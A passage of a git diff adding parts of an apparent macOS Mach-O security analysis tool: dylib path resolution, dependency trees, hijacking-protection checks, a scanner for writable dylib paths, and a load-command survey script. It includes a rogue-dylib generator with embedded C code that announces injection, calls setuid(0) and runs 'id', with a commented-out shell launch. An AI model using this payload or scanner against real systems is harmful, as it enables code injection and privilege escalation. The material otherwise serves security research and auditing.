                    args.prepare_dylib = None
                snake_instance.prepareRogueDylib(args.prepare_dylib)
        except Exception as e:
            print(f"An error occurred during SnakeIV: Dylibs processing: {e}")
SnakeIV(SnakeIII): + def __init__(self, binaries, file_path): + super().__init__(binaries, file_path) + self.dylib_load_commands_names = { + 'LAZY_LOAD_DYLIB', + 'LOAD_DYLIB', + 'LOAD_UPWARD_DYLIB', + 'LOAD_WEAK_DYLIB', + 'PREBOUND_DYLIB', + 'REEXPORT_DYLIB', + } + self.dylib_id_path = self.getPathFromDylibID() # Get Dylib ID for @loader_path resolving + self.dylib_loading_commands, self.dylib_loading_commands_names = self.getDylibLoadCommands() # 1. Get dylib specific load commands + self.rpath_list = self.resolveRunPathLoadCommands() # 2. Get LC_RPATH list + self.absolute_paths = self.resolveDylibPaths() # 3. Get all dylib absolute paths dictionary {dylib_name[dylib_paths]} + self.dyld_share_cache_path = '/System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e' + + def getSharedLibraries(self, only_names=True): + '''Return array of shared libraries used by the binary. When the only_names is set to False it aslo prints compatibility and current version of each library.''' + dylibs = [] + for library in self.binary.libraries: + if only_names: + dylibs.append(library.name) + else: + formatted_compat_version = ".".join(map(str, library.compatibility_version)) + formatted_current_version = ".".join(map(str, library.current_version)) + dylibs.append(f"{library.name} (compatibility version: {formatted_compat_version}, current version: {formatted_current_version})") + return dylibs + + def getDylibLoadCommands(self): + '''Return a list of load commands that load dylibs.''' + dylib_loading_commands = [] + dylib_loading_commands_names = [] + + for cmd in self.load_commands: + cmd_name = cmd.command.name + if cmd_name in self.dylib_load_commands_names: + dylib_loading_commands.append(cmd) + dylib_loading_commands_names.append(cmd_name) + + return dylib_loading_commands, dylib_loading_commands_names + + def getUnresolvedRunPathLoadCommandsPaths(self): + ''' + Return a list of unresolved paths (like @executable_path/Frameworks) from LC_RPATH load 
commands. Example return: + ['/usr/lib/swift', '@executable_path/Frameworks', '@loader_path/Frameworks'] + ''' + return [cmd.path for cmd in self.load_commands if cmd.command.name == 'RPATH'] + + def resolveRunPathLoadCommands(self): + ''' + Return a list of resolved (absolute) paths from LC_RPATH. Example return: + ['/usr/lib/swift', '/Applications/Suunto.app/WrappedBundle/Frameworks', '/Applications/Suunto.app/WrappedBundle/Frameworks'] + ''' + executable_path = os.path.dirname(self.file_path) + if self.dylib_id_path: + loader_path = self.dylib_id_path + else: + loader_path = executable_path + + unresolved_LC_RPATHS = self.getUnresolvedRunPathLoadCommandsPaths() + LC_RPATHS = [] + for path in unresolved_LC_RPATHS: + if path.startswith('@executable_path'): + path = path.replace('@executable_path',executable_path) + LC_RPATHS.append(path) + elif path.startswith('@loader_path'): + path = path.replace('@loader_path',loader_path) + LC_RPATHS.append(path) + else: + LC_RPATHS.append(path) + return LC_RPATHS + + def extractPathFromDylibLoadCommandStruct(self, dylib_load_command): + '''Extracts the string path from a dylib load command structure.''' + cmd_data = bytes(dylib_load_command.data) + offset_data = cmd_data[8:] + offset = int.from_bytes(offset_data[:4], byteorder=self.endianess) + string_data = cmd_data[offset:] + null_index = string_data.find(0) + path_bytes = string_data[:null_index] + path_string = path_bytes.decode('utf-8') + return path_string + + def resolveRunPathPaths(self, path): + ''' + Return ordered list of resolved @rpaths for the given dylib path. 
        Example return for self.rpath_list = ['/1/', '/2/'] and dylib path = @rpath/test.dylib
        [ '/1/test.dylib', '/2/test.dylib']
        '''
        resolved_rpaths = []
        for rpath in self.rpath_list:
            # Substitute each known run-path search directory for the @rpath token.
            resolved_rpaths.append(path.replace('@rpath',rpath))
        return resolved_rpaths

    def resolveDylibPaths(self):
        '''
        Return a dictionary of dylib_name : dylib_absolute_paths.
        Paths are absolute (with resolved @rpath, @executable_path, @loader_path).
        '''
        executable_path = os.path.dirname(self.file_path)
        # @loader_path is the directory of the loading image: for a dylib that is the
        # LC_ID_DYLIB directory, otherwise fall back to the executable's directory.
        if self.dylib_id_path:
            loader_path = self.dylib_id_path
        else:
            loader_path = executable_path
        absolute_paths = {}

        for dylib_load_command in self.dylib_loading_commands:
            path = self.extractPathFromDylibLoadCommandStruct(dylib_load_command)
            name = os.path.basename(path)

            if name not in absolute_paths:
                absolute_paths[name] = []

            if path.startswith('@executable_path'):
                path = path.replace('@executable_path', executable_path)
                absolute_paths[name].append(path)

            elif path.startswith('@rpath'):
                # A single @rpath entry expands to one candidate per LC_RPATH.
                paths = self.resolveRunPathPaths(path)
                absolute_paths[name].extend(paths)

            elif path.startswith('@loader_path'):
                path = path.replace('@loader_path', loader_path)
                absolute_paths[name].append(path)

            else:
                # Plain path (absolute, or relative - see checkBrokenRelativeDylibSource).
                absolute_paths[name].append(path)

        return absolute_paths

    def checkBrokenRelativeDylibSource(self):
        '''
        Check for bad dylib source.
        When Dylib is relative, but does not use @executable_path | @loader_path | @rpath.
        For example: mylib.dylib instead of @executable_path/mylib.dylib
        '''
        broken_relative_dylibs = []
        for _, paths in self.absolute_paths.items(): # Iterate dylibs:paths dictionary
            for path in paths:
                # After resolution every legitimate path is absolute; anything else is broken.
                if not path.startswith('/'):
                    broken_relative_dylibs.append(path)

        return broken_relative_dylibs

    def checkIfPathExists(self, path):
        '''Check if specified path exists on the filesystem.'''
        return os.path.exists(path)

    def checkIfPathExistsInDyldSharedCache(self, path, extracted_dyld_share_cache_directory_path):
        '''Return if the path exists in the DSC - you must first extract it.'''
        # Rebase the (absolute-looking) install path under the extracted cache root.
        path = os.path.abspath(extracted_dyld_share_cache_directory_path) + "/" + path
        return self.checkIfPathExists(path)

    def runDyldSharedCacheExtractor(self, dyld_share_cache_path, extracted_output_path):
        '''Run dyld-shared-cache-extractor command.'''
        command = ['dyld-shared-cache-extractor', dyld_share_cache_path, extracted_output_path]
        subprocess.run(command, check=True)

    def getDylibTree(self, dyld_share_cache_path=None, extracted_output_path=None, is_extracted=0):
        '''
        A function that inspects the dynamic dependencies of a Mach-O binary recursively (like recursive otool -L).
        You must use absolute path in --path if you are using --dylibtree from extracted Dyld Shared Cache.
        '''
        if dyld_share_cache_path in [None, '']:
            dyld_share_cache_path = self.dyld_share_cache_path

        if extracted_output_path in [None, '']:
            extracted_output_path = 'extracted_dyld_share_cache/'
        extracted_output_path = os.path.abspath(extracted_output_path) # Convert to absolute path

        # NOTE(review): compared as a string because the value arrives from the CLI -
        # confirm no caller ever passes the integer default 0, which would not match '0'.
        if is_extracted == '0':
            self.runDyldSharedCacheExtractor(dyld_share_cache_path, extracted_output_path)

        dylibtree = treelib.Tree()
        path_to_process = [self.file_path]  # Worklist of binaries still to parse.
        already_checked_paths = []
        not_existing_paths = [] # It could be the already_checked_paths for optimization, but for code clarity it stays.
        node_id = 0
        dylibtree.create_node(self.file_path, node_id)  # Root node is the inspected binary itself.

        while path_to_process:
            current_path = path_to_process.pop()

            if (current_path not in path_to_process) and (current_path not in already_checked_paths) and (current_path not in not_existing_paths):
                fat_binary = lief.MachO.parse(current_path)
                dylib_snake_instance = SnakeIV(fat_binary, current_path)

                # Show DSC-extracted binaries by their in-cache install path.
                if current_path.startswith(extracted_output_path):
                    current_path = current_path.removeprefix(extracted_output_path)

                for _, dylib_paths in dylib_snake_instance.absolute_paths.items():
                    for path in dylib_paths: # All dylibs for current binary (current_path from existing_path_to_process)
                        absolute_path = os.path.abspath(path)
                        node_id += 1
                        filtered_nodes = list(dylibtree.filter_nodes(lambda node: node.tag == current_path))
                        nid_of_first_occurance_of_dylib_in_dylibtree = filtered_nodes[0].identifier
                        # If path exist on the filesystem or DSC, add as a leaf to tree
                        ## current_path(root) -> absolute_path(leaf)
                        if absolute_path not in path_to_process:
                            if dylib_snake_instance.checkIfPathExists(absolute_path):
                                path_to_process.append(absolute_path) # Add this path to process recursively in while loop
                                dylibtree.create_node(absolute_path, node_id, parent=nid_of_first_occurance_of_dylib_in_dylibtree) # Add a path as a leaf
                            elif dylib_snake_instance.checkIfPathExistsInDyldSharedCache(path, extracted_output_path):
                                dsc_path = extracted_output_path + path
                                path_to_process.append(dsc_path)
                                dylibtree.create_node(absolute_path, node_id, data='\033[94mDSC\033[0m', parent=nid_of_first_occurance_of_dylib_in_dylibtree) # Add a path as a leaf
                            else:
                                not_existing_paths.append(absolute_path)
                                dylibtree.create_node(absolute_path, node_id, data='\033[91mWARNING - not existing path\033[0m', parent=nid_of_first_occurance_of_dylib_in_dylibtree)

                # If the node path (current_path) was checked, it should not be unwind again.
                already_checked_paths.append(current_path)
                already_checked_paths.append(extracted_output_path + current_path)

        return dylibtree

    def getDylibID(self):
        '''
        Return a LC_ID_DYLIB Load Command if exists.
        Dyld additionally check if the FILE TYPE == MH_DYLIB.
        I intentionally omit this step to always extract ID.
        '''
        for cmd in self.load_commands:
            if cmd.command.name == 'ID_DYLIB':
                return cmd
        return None

    def getPathFromDylibID(self):
        '''Return a path stored inside the Dylib ID Load Command.'''
        dylib_id_lc = self.getDylibID()
        if dylib_id_lc:
            return self.extractPathFromDylibLoadCommandStruct(dylib_id_lc)
        return None

    def printTreeFromTreelib(self, tree):
        '''
        Helper function for printing the dylibtree.
        It will only work with this structure because the root id is equal to 0 (tree.get_node(0)), which is not always true.
        I had to write this to make pretty printing with data work because, by default, treelib does not support printing with data.
        Data is needed to show warnings if any library is missing on the filesystem and to inform if the library was from Dyld Shared Cache.
+ ''' + def recursivePrint(node, prefix="", last=True): + data_str = f": {node.data}" if node.data else "" + print(f"{prefix}{'`-- ' if last else '|-- '}{node.tag}{data_str}") + + children = tree.children(node.identifier) + count = len(children) + + for i, child in enumerate(children): + is_last = i == count - 1 + child_prefix = f"{prefix}{' ' if last else '| '}" + recursivePrint(child, child_prefix, is_last) + + root = tree.get_node(0) + recursivePrint(root) + + def printDylibs(self): + print(f"{self.file_path} depends on libraries:") + for d in self.getSharedLibraries(only_names=False): + print(f"\t{d}") + + def printRpathsResolved(self): + '''Print all paths that @rpath can be resolved to.''' + print(*self.rpath_list, sep="\n") + + def printRpathsUnresolved(self): + print(*self.getUnresolvedRunPathLoadCommandsPaths(), sep="\n") + + def printResolvedDylibPaths(self): + '''Prints all resolved (absolute) dylib loading commands paths.''' + for _, dylib_paths in self.absolute_paths.items(): + print(*dylib_paths, sep='\n') + + def printUnresolvedDylibPaths(self): + '''Prints all unresolved (with @rpath|@executable_path|@loader_path) dylib loading commands paths.''' + for dylib_load_command in self.dylib_loading_commands: + print(self.extractPathFromDylibLoadCommandStruct(dylib_load_command)) + + def printBrokenRelativePaths(self): + '''Print 'broken' relative paths from the binary (cases where the dylib source is specified for an executable directory without @executable_path)''' + for broken_path in self.checkBrokenRelativeDylibSource(): + print(broken_path) + + def getMissingPaths(self): + ''' + Return two unique lists of missing and existing paths. 
+ ''' + missing_paths = [] + existing_paths = [] + for _, paths in self.absolute_paths.items(): + for path in paths: + if os.path.exists(path): + existing_paths.append(path) + break # Stop checking further paths for this dylib + else: + missing_paths.append(path) + unique_missing = list(set(missing_paths)) + unique_existing = list(set(existing_paths)) + return unique_missing, unique_existing + + def checkWriteAccessMissing(self, paths): + ''' + Check write access for the given paths. + In case the directory does not exists, traverse back till directory that exists and check write access there. + Return a list of writeable directories. + ''' + write_accessible_paths = [] + for path in paths: + current_path = path + if os.access(current_path, os.W_OK): + write_accessible_paths.append(path) + continue + while current_path: + current_path = os.path.dirname(current_path) + if not os.path.exists(current_path): + continue + if os.access(current_path, os.W_OK): + write_accessible_paths.append(path) + break + else: + break + + return write_accessible_paths + + def checkWriteAccessExisting(self, paths): + '''Return a list of write-accessible paths.''' + write_accessible_paths = [] + for path in paths: + if os.access(path, os.W_OK): + write_accessible_paths.append(path) + + return write_accessible_paths + + def hasLibraryValidationFlag(self, file_path): + '''Check Library validation flag for given binary.''' + if b'library-validation' in self.getCodeSignature(file_path): + return True + return False + + def hasDisableLibraryValidationEntitlement(self, file_path): + '''Checks if the binary has com.apple.security.cs.disable-library-validation or com.apple.private.security.clear-library-validation entitlement set, which allows loading dylibs without requiring code signing.''' + if self.checkIfEntitlementIsUsed('com.apple.security.cs.disable-library-validation', 'true', file_path) or self.checkIfEntitlementIsUsed('com.apple.private.security.clear-library-validation','true', 
file_path): + return True + return False + + def getDyldSharedCacheDylibsPaths(self, dsc_path): + ''' + Parse Dyld Shared Cache using ipsw to extract dylib paths. + Ref: https://blacktop.github.io/ipsw/docs/guides/dyld/ + ''' + if dsc_path == None: + dsc_path = self.dyld_share_cache_path + + command = f"ipsw dyld info {dsc_path} -l -j >> /tmp/dyld_shared_cache_temp_1234.json" + subprocess.run(command, shell=True, check=True) + + with open('/tmp/dyld_shared_cache_temp_1234.json', 'r') as file: + data = json.load(file) + os.remove('/tmp/dyld_shared_cache_temp_1234.json') + + # jq -r '.dylibs[].name' dsc.json + paths = [dylib['name'] for dylib in data.get('dylibs', [])] + return paths + + def printDyldSharedCacheDylibsPaths(self, dsc_path): + '''Print Dyld paths from Dyld Shared Cache.''' + if dsc_path == None: + dsc_path = self.dyld_share_cache_path + + paths = self.getDyldSharedCacheDylibsPaths(dsc_path) + for path in paths: + print(path) + + def checkDylibHijackingProtections(self, file_path): + '''Check protections against dylib hijacking.''' + + # Check if 'com.apple.security.cs.disable-library-validation' or 'com.apple.private.security.clear-library-validation' entitlements are present and set to true - INSECURE. 
+ has_insecure_entitlement = self.hasDisableLibraryValidationEntitlement(file_path) + + # Check if Library validation or Hardened runtime is active - SECURE + is_hardened_runtime_active = self.hasHardenedRuntimeFlag(file_path) + is_library_validation_active = self.hasLibraryValidationFlag(file_path) + + if has_insecure_entitlement: # Entitlements disables protections + return False + elif is_hardened_runtime_active or is_library_validation_active: # If there are no entitlements and HR or LV exists, then protections is ON + return True + else: # If there are no insecure entitlements, but there are also no HR or LV, there are no protections + return False + + def dylibHijackingScanner(self, dyld_share_cache_path): + '''Direct and Indirect Dylib Hijacking Scanner - return dictionary of results for main binary and each dependancy.''' + + if dyld_share_cache_path in [None, '']: + dyld_share_cache_path = self.dyld_share_cache_path + + dsc_paths = self.getDyldSharedCacheDylibsPaths(dyld_share_cache_path) + already_checked_paths = [] + all_results = {} + path_to_process = [self.file_path] + + while path_to_process: + current_path = path_to_process.pop() + + result = { + 'is_protected' : bool, + 'writeable_missing_paths' : [], + 'writeable_existing_paths' : [] + } + + if (current_path not in already_checked_paths) and (current_path not in dsc_paths): + fat_binary = lief.MachO.parse(current_path) + dylib_snake_instance = SnakeIV(fat_binary, current_path) + + missing_paths, existing_paths = dylib_snake_instance.getMissingPaths() + result['writeable_missing_paths'] = dylib_snake_instance.checkWriteAccessMissing(missing_paths) + result['writeable_existing_paths'] = dylib_snake_instance.checkWriteAccessExisting(existing_paths) + result['is_protected'] = dylib_snake_instance.checkDylibHijackingProtections(dylib_snake_instance.file_path) + + already_checked_paths.append(current_path) + path_to_process.extend(existing_paths) + all_results[current_path] = result + return all_results 
    def parseDylibHijackingScannerResults(self, all_results):
        '''Print the dylibHijackingScanner results in a nice format.'''
        for current_path, result in all_results.items():
            if result['is_protected']:
                print(f"{current_path}: \033[92mPROTECTED\033[0m")
            else:
                print(f"{current_path}: \033[91mNOT PROTECTED\033[0m")
            if result['writeable_existing_paths']:
                print(f"\033[91m[!] WRITEABLE EXISTING PATHS\033[0m: {', '.join(map(str, result['writeable_existing_paths']))}")
            if result['writeable_missing_paths']:
                print(f"\033[91m[!] WRITEABLE MISSING PATHS\033[0m: {', '.join(map(str, result['writeable_missing_paths']))}")
            print("-"*28)

    def getReExportLoadCommands(self):
        '''
        Return a list of REEXPORT_DYLIB Load Commands if exists.
        '''
        reexport_load_commands = []
        for cmd in self.load_commands:
            if cmd.command.name == 'REEXPORT_DYLIB':
                reexport_load_commands.append(cmd)
        return reexport_load_commands

    def getReExportPaths(self):
        '''Return paths stored inside the REEXPORT_DYLIB Load Commands.'''
        reexport_load_commands = self.getReExportLoadCommands()
        paths = []
        if reexport_load_commands:
            for load_command in reexport_load_commands:
                paths.append(self.extractPathFromDylibLoadCommandStruct(load_command))
        return paths

    def getImportedSymbols(self, target_library_path):
        '''
        It works on the dylib specified in the --path.
        Returns the imported symbols from the external library (target_library_path)
        DYLIB_ID of the target_library_path must be equal to the path in order to work properly.
        https://lief-project.github.io/doc/stable/api/python/macho.html#binary
        https://lief-project.github.io/doc/stable/api/python/macho.html#binding-info
        https://lief-project.github.io/doc/stable/api/python/macho.html#dylibcommand
        '''
        if target_library_path:
            imported_symbols = []
            for symbol in self.binary.imported_symbols:
                # Keep only symbols bound against the requested library.
                if symbol.binding_info.library.name == target_library_path:
                    imported_symbols.append(symbol.name)
            return imported_symbols
        # NOTE(review): implicitly returns None when target_library_path is falsy - callers must handle it.

    def prepareRogueDylib(self, target_library_path):
        '''
        Compile m.dylib which by default:
        1. Prints log about successful injection to stdout & stderr syslog.
        2. If the binary is SUID, sets RUID to EUID and prints user ID.
        '''
        file_name_c = 'm.c'
        source_code = SourceCodeManager.dylib_hijacking
        output_filename = 'm.dylib'
        flag_list = ['-dynamiclib']
        imported_sybols = self.getImportedSymbols(target_library_path)
        if imported_sybols:
            for symbol in imported_sybols:
                symbol = symbol.lstrip('_')  # Drop the Mach-O leading underscore to get the C name.
                function_to_add = f'\nvoid {symbol}(void){{}}'  # Empty stub so the rogue dylib exports the expected symbol.
                source_code += function_to_add

        SourceCodeManager.clangCompilerWrapper(file_name_c, source_code, output_filename, flag_list)
### --- ARGUMENT PARSER --- ###
class ArgumentParser:
    def __init__(self):
        '''Class for parsing arguments from the command line.
        I decided to remove it from main() for additional readability and easier code maintenance in the VScode'''
        self.parser = argparse.ArgumentParser(description="Mach-O files parser for binary analysis")
        self.addGeneralArgs()
        self.addMachOArgs()
        self.addCodeSignArgs()
        self.addChecksecArgs()
        self.addDylibsArgs()

    def addGeneralArgs(self):
        '''Arguments shared by every module.'''
        self.parser.add_argument('-p', '--path', required=True, help="Path to the Mach-O file")

    def addMachOArgs(self):
        '''Arguments of the Mach-O structure module.'''
        macho_group = self.parser.add_argument_group('MACH-O ARGS')
        macho_group.add_argument('--file_type', action='store_true', help="Print binary file type")
        macho_group.add_argument('--header_flags', action='store_true', help="Print binary header flags")
        macho_group.add_argument('--endian', action='store_true', help="Print binary endianess")
        macho_group.add_argument('--header', action='store_true', help="Print binary header")
        macho_group.add_argument('--load_commands', action='store_true', help="Print binary load commands names")
        macho_group.add_argument('--segments', action='store_true', help="Print binary segments in human-friendly form")
        macho_group.add_argument('--sections', action='store_true', help="Print binary sections in human-friendly form")
        macho_group.add_argument('--symbols', action='store_true', help="Print all binary symbols")
        macho_group.add_argument('--chained_fixups', action='store_true', help="Print Chained Fixups information")
        macho_group.add_argument('--exports_trie', action='store_true', help="Print Export Trie information")
        macho_group.add_argument('--uuid', action='store_true', help="Print UUID")
        macho_group.add_argument('--main', action='store_true', help="Print entry point and stack size")
        macho_group.add_argument('--encryption_info', nargs='?',const='', help="Print encryption info if any. Optionally specify an output path to dump the encrypted data (if cryptid=0, data will be in plain text)", metavar="(optional) save_path.bytes")
        macho_group.add_argument('--strings_section', action='store_true', help="Print strings from __cstring section")
        macho_group.add_argument('--all_strings', action='store_true', help="Print strings from all sections")
        macho_group.add_argument('--save_strings', help="Parse all sections, detect strings, and save them to a file", metavar='all_strings.txt')
        macho_group.add_argument('--info', action='store_true', default=False, help="Print header, load commands, segments, sections, symbols, and strings")

    def addCodeSignArgs(self):
        '''Arguments of the code-signing module.'''
        codesign_group = self.parser.add_argument_group('CODE SIGNING ARGS')
        codesign_group.add_argument('--verify_signature', action='store_true', default=False, help="Code Signature verification (if the contents of the binary have been modified)")
        codesign_group.add_argument('--cd_info', action='store_true', default=False, help="Print Code Signature information")
        codesign_group.add_argument('--cd_requirements', action='store_true', default=False, help="Print Code Signature Requirements")
        codesign_group.add_argument('--entitlements', help="Print Entitlements in a human-readable, XML, or DER format (default: human)", nargs='?', const='human', metavar='human|xml|var')
        codesign_group.add_argument('--extract_cms', help="Extract CMS Signature from the Code Signature and save it to a given file", metavar='cms_signature.der')
        codesign_group.add_argument('--extract_certificates', help="Extract Certificates and save them to a given file. To each filename will be added an index at the end: _0 for signing, _1 for intermediate, and _2 for root CA certificate", metavar='certificate_name')
        codesign_group.add_argument('--remove_sig', help="Save the new file on a disk with removed signature", metavar='unsigned_binary')
        codesign_group.add_argument('--sign_binary', help="Sign binary using specified identity - use : 'security find-identity -v -p codesigning' to get the identity (default: adhoc)", nargs='?', const='adhoc', metavar='adhoc|identity_number')

    def addChecksecArgs(self):
        '''Arguments of the checksec module.'''
        checksec_group = self.parser.add_argument_group('CHECKSEC ARGS')
        checksec_group.add_argument('--has_pie', action='store_true', default=False, help="Check if Position-Independent Executable (PIE) is set")
        checksec_group.add_argument('--has_arc', action='store_true', default=False, help="Check if Automatic Reference Counting (ARC) is in use (can be false positive)")
        checksec_group.add_argument('--is_stripped', action='store_true', default=False, help="Check if binary is stripped")
        checksec_group.add_argument('--has_canary', action='store_true', default=False, help="Check if Stack Canary is in use (can be false positive)")
        checksec_group.add_argument('--has_nx_stack', action='store_true', default=False, help="Check if stack is non-executable (NX stack)")
        checksec_group.add_argument('--has_nx_heap', action='store_true', default=False, help="Check if heap is non-executable (NX heap)")
        checksec_group.add_argument('--has_xn', action='store_true', default=False, help="Check if binary is protected by eXecute Never (XN) ARM protection")
        checksec_group.add_argument('--is_notarized', action='store_true', default=False, help="Check if the application is notarized and can pass the Gatekeeper verification")
        checksec_group.add_argument('--is_encrypted', action='store_true', default=False, help="Check if the application is encrypted (has LC_ENCRYPTION_INFO(_64) and cryptid set to 1)")
        checksec_group.add_argument('--has_restrict', action='store_true', default=False, help="Check if binary has __RESTRICT segment")
        checksec_group.add_argument('--is_hr', action='store_true', default=False, help="Check if the Hardened Runtime is in use")
        checksec_group.add_argument('--is_as', action='store_true', default=False, help="Check if the App Sandbox is in use")
        checksec_group.add_argument('--is_fort', action='store_true', default=False, help="Check if the binary is fortified")
        checksec_group.add_argument('--has_rpath', action='store_true', default=False, help="Check if the binary utilise any @rpath variables")
        checksec_group.add_argument('--checksec', action='store_true', default=False, help="Run all checksec module options on the binary")

    def addDylibsArgs(self):
        '''Arguments of the dylibs module.'''
        dylibs_group = self.parser.add_argument_group('DYLIBS ARGS')
        dylibs_group.add_argument('--dylibs', action='store_true', default=False, help="Print shared libraries used by specified binary with compatibility and the current version (loading paths unresolved, like @rpath/example.dylib)")
        dylibs_group.add_argument('--rpaths', action='store_true', default=False, help="Print all paths (resolved) that @rpath can be resolved to")
        dylibs_group.add_argument('--rpaths_u', action='store_true', default=False, help="Print all paths (unresolved) that @rpath can be resolved to")
        dylibs_group.add_argument('--dylibs_paths', action='store_true', default=False, help="Print absolute dylib loading paths (resolved @rpath|@executable_path|@loader_path) in order they are searched for")
        dylibs_group.add_argument('--dylibs_paths_u', action='store_true', default=False, help="Print unresolved dylib loading paths.")
        dylibs_group.add_argument('--broken_relative_paths', action='store_true', default=False, help="Print 'broken' relative paths from the binary (cases where the dylib source is specified for an executable directory without @executable_path)")
        dylibs_group.add_argument('--dylibtree', metavar=('cache_path,output_path,is_extracted'), nargs = '?', const=",,0", help='Print the dynamic dependencies of a Mach-O binary recursively. You can specify the Dyld Shared Cache path in the first argument, the output directory as the 2nd argument, and if you have already extracted DSC in the 3rd argument (0 or 1). The output_path will be used as a base for dylibtree. For example, to not extract DSC, use: --dylibs ",,1", or to extract from default to default use just --dylibs or --dylibs ",,0" which will extract DSC to extracted_dyld_share_cache/ in the current directory')
        dylibs_group.add_argument('--dylib_id', action='store_true', default=False, help="Print path from LC_ID_DYLIB")
        dylibs_group.add_argument('--reexport_paths', action='store_true', default=False, help="Print paths from LC_REEXPORT_DLIB")
        dylibs_group.add_argument('--hijack_sec', action='store_true', default=False, help="Check if binary is protected against Dylib Hijacking")
        dylibs_group.add_argument('--dylib_hijacking', metavar='cache_path' ,nargs="?", const="default", help="Check for possible Direct and Indirect Dylib Hijacking loading paths. (optional) Specify the path to the Dyld Shared Cache")
        dylibs_group.add_argument('--prepare_dylib', metavar='target_dylib_path' ,nargs="?", const="default", help="Compile rogue dylib. (optional) Specify target_dylib_path, it will search for the imported symbols from it in the dylib specified in the --path argument and automatically add it to the source code of the rogue lib. Example: --path lib1.dylib --prepare_dylib /path/to/lib2.dylib")



    def parseArgs(self):
        '''Parse and return the command-line arguments.'''
        return self.parser.parse_args()

    def printAllArgs(self, args):
        '''Just for debugging.
This method is a utility designed to print all parsed arguments and their corresponding values.''' + for arg, value in vars(args).items(): + print(f"{arg}: {value}") +### --- SOURCE CODE --- ### +class SourceCodeManager: + dylib_hijacking = r''' +// clang -dynamiclib m.c -o m.dylib //-o $PWD/TARGET_DYLIB +#include +#include +#include +#include + +__attribute__((constructor)) +void myconstructor(int argc, const char **argv) +{ + syslog(LOG_ERR, "[+] m.dylib injected in %s\n", argv[0]); + printf("[+] m.dylib injected in %s\n", argv[0]); + setuid(0); + system("id"); + //system("/bin/sh"); +} +''' + @staticmethod + def clangCompilerWrapper(file_name_c, source_code, output_filename, flag_list=None): + # Save the source code to a file + with open(file_name_c, "w") as source_file: + source_file.write(source_code) + + # Compile the source code using clang + clang_command = ["clang", file_name_c, "-o", output_filename, *flag_list] + subprocess.run(clang_command, check=True) + +if __name__ == "__main__": + arg_parser = ArgumentParser() + args = arg_parser.parseArgs() + + file_path = os.path.abspath(args.path) + + ### --- I. MACH-O --- ### + macho_processor = MachOProcessor(file_path) + macho_processor.process() + + ### --- II. CODE SIGNING --- ### + code_signing_processor = CodeSigningProcessor() + code_signing_processor.process() + + ### --- III. CHECKSEC --- ### + checksec_processor = ChecksecProcessor() + checksec_processor.process() + + ### --- IV. DYLIBS --- ### + dylibs_processor = DylibsProcessor() + dylibs_processor.process() \ No newline at end of file diff --git a/IV. Dylibs/python/MachODylibLoadCommandsFinder.py b/IV. Dylibs/python/MachODylibLoadCommandsFinder.py new file mode 100644 index 0000000..0df67f7 --- /dev/null +++ b/IV. 
Dylibs/python/MachODylibLoadCommandsFinder.py new file mode 100644 index 0000000..0df67f7 --- /dev/null +++ b/IV. Dylibs/python/MachODylibLoadCommandsFinder.py @@ -0,0 +1,100 @@
#!/usr/bin/env python3
import os
import lief


class MachODylibLoadCommandsFinder:
    '''
    Recursively crawl the system and parse Mach-O files to find DYLIB related load commands.
    1. Check if the file is a Mach-O.
    2. List all Load Commands.
    3. Check if any DYLIB-related LC exists.
        LC_LOAD_DYLIB
        LC_ID_DYLIB
        LC_PREBOUND_DYLIB
        LC_LOAD_WEAK_DYLIB
        LC_REEXPORT_DYLIB
        LC_LAZY_LOAD_DYLIB
        LC_LOAD_UPWARD_DYLIB
        LC_RPATH
    4. Print the total Mach-O files analyzed and how many DYLIB-related LCs existed.
    '''
    def __init__(self):
        # total_files_analyzed counts only ARM64 slices (see parseFatBinary).
        self.total_files_analyzed = 0
        # file_path -> set of dylib-related LC names found in that binary.
        self.binary_dylibs = {}
        # Global tally per load-command type across all scanned binaries.
        self.dylib_counts = {
            "LC_LOAD_DYLIB" : 0,
            "LC_ID_DYLIB": 0,
            "LC_PREBOUND_DYLIB": 0,
            "LC_LOAD_WEAK_DYLIB": 0,
            "LC_REEXPORT_DYLIB": 0,
            "LC_LAZY_LOAD_DYLIB": 0,
            "LC_LOAD_UPWARD_DYLIB": 0,
            "LC_RPATH": 0,
        }

    def parseDirectory(self, directory_path):
        '''Recursively check if the path is a file. If it is, use checkIfMacho method.'''
        for root, dirs, files in os.walk(directory_path):
            for file in files:
                file_path = os.path.join(root, file)
                if os.path.isfile(file_path):
                    self.checkIfMacho(file_path)

    def checkIfMacho(self, file_path):
        '''Parse with LIEF; non-Mach-O files yield a falsy result and are skipped.'''
        binaries = lief.MachO.parse(file_path)
        if binaries:
            self.parseFatBinary(binaries, file_path)

    def parseFatBinary(self, binaries, file_path):
        '''Iterate each slice of a (fat) binary; only ARM64 slices are analyzed.'''
        for binary in binaries:
            if binary.header.cpu_type == lief.MachO.CPU_TYPES.ARM64:
                self.total_files_analyzed += 1
                self.checkDylibLoadCommands(binary, file_path)

    def checkDylibLoadCommands(self, binary, file_path):
        '''Tally every dylib-related load command present in the binary.'''
        dylib_related_lcs = {
            lief.MachO.LOAD_COMMAND_TYPES.LOAD_DYLIB: "LC_LOAD_DYLIB",
            lief.MachO.LOAD_COMMAND_TYPES.ID_DYLIB: "LC_ID_DYLIB",
            lief.MachO.LOAD_COMMAND_TYPES.PREBOUND_DYLIB: "LC_PREBOUND_DYLIB",
            lief.MachO.LOAD_COMMAND_TYPES.LOAD_WEAK_DYLIB: "LC_LOAD_WEAK_DYLIB",
            lief.MachO.LOAD_COMMAND_TYPES.REEXPORT_DYLIB: "LC_REEXPORT_DYLIB",
            lief.MachO.LOAD_COMMAND_TYPES.LAZY_LOAD_DYLIB: "LC_LAZY_LOAD_DYLIB",
            lief.MachO.LOAD_COMMAND_TYPES.LOAD_UPWARD_DYLIB: "LC_LOAD_UPWARD_DYLIB",
            lief.MachO.LOAD_COMMAND_TYPES.RPATH: "LC_RPATH",
        }

        binary_dylibs_set = set()

        for cmd in binary.commands:
            if cmd.command in dylib_related_lcs:
                lc_name = dylib_related_lcs[cmd.command]
                self.dylib_counts[lc_name] += 1
                binary_dylibs_set.add(lc_name)

        self.binary_dylibs[file_path] = binary_dylibs_set

    def print_results(self):
        '''Print the aggregate LC counters and the per-binary LC sets.'''
        print(f"Total Mach-O files analyzed: {self.total_files_analyzed}")
        print("DYLIB-related LC counts:")
        for lc, count in self.dylib_counts.items():
            print(f"{lc}: {count}")

        print("\nBinary Dylibs:")
        for binary, dylibs in self.binary_dylibs.items():
            print(f"{binary}: {dylibs}")

    def save_results(self):
        '''Append the same report to MachODylibLoadCommandsFinder_results.txt.'''
